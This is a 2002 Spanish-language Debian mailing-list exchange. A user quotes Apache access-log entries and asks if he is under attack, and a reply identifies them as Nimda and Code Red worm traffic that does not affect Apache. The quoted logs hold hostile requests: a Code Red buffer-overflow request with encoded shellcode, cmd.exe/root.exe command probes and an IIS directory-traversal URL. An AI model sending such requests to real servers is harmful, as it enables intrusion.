Re: [Posible OT]Mas apache
Hola
bienvenido al mundo de los gusanos, son dos distintos los que te estan
"atacando" el nimda y el red code, sin duda esto se debe al nivel que
tienen los administradores de IIS despues de 2 años aun seguimos
teniendo estos problemitas, por lo demas apache no esta afectado por
ninguno de estos dos.
Saludos, Roberto
On Fri, May 10, 2002 at 05:11:26PM +0200, Aitor wrote:
> Hola a todos:
> Tengo el apache 1.3.24 instalado desde hace poco (para probarlo) y ayer
> mirando el acces.log me encontre con esto:
> 218.25.47.223 - - [09/May/2002:01:31:06 +0200] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%uc
> bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
> u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0"
> 400 331 "-" "-"
>
> y con esto:
>
> 217.216.124.199 - - [09/May/2002:15:26:26 +0200] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
> 217.216.124.199 - - [09/May/2002:15:26:29 +0200] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 287 "-" "-"
> 217.216.124.199 - - [09/May/2002:15:26:36 +0200] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
>
> Buscando exploits y eso me encontre con este (aunque solo es de IIS):
>
> http://ip/default.asp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
> %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
> %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
> %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
> %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
> %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htw?CiwebhitsFile=/../..
> /./..test.txt&CiRestriction=none&CiHiliteType=Full
>
> Que mas o menos se parece la pregunta es: ¿Alguien esta intentado algo
> raro?¿o es mejor que deje las bebidas de alta graduacion:-)?
> Si alguien me pudiera aclarar esto ya digo que tengo el server desde hace
> poco y lo puse para probar
>
> Gracias y perdonad por el posible [OT] y por lo largo del texto :-)
> --
> ____________________________________
> * *
> * web personal: http://go.to/nuestra.web *
> * Linux user #255925 *
> * Debian/GNU *
> * Kernel 2.2.18 *
> *___________________________________*
>
>
> --
> To UNSUBSCRIBE, email to debian-user-spanish-request@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
>
--
To UNSUBSCRIBE, email to debian-user-spanish-request@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
Reply to: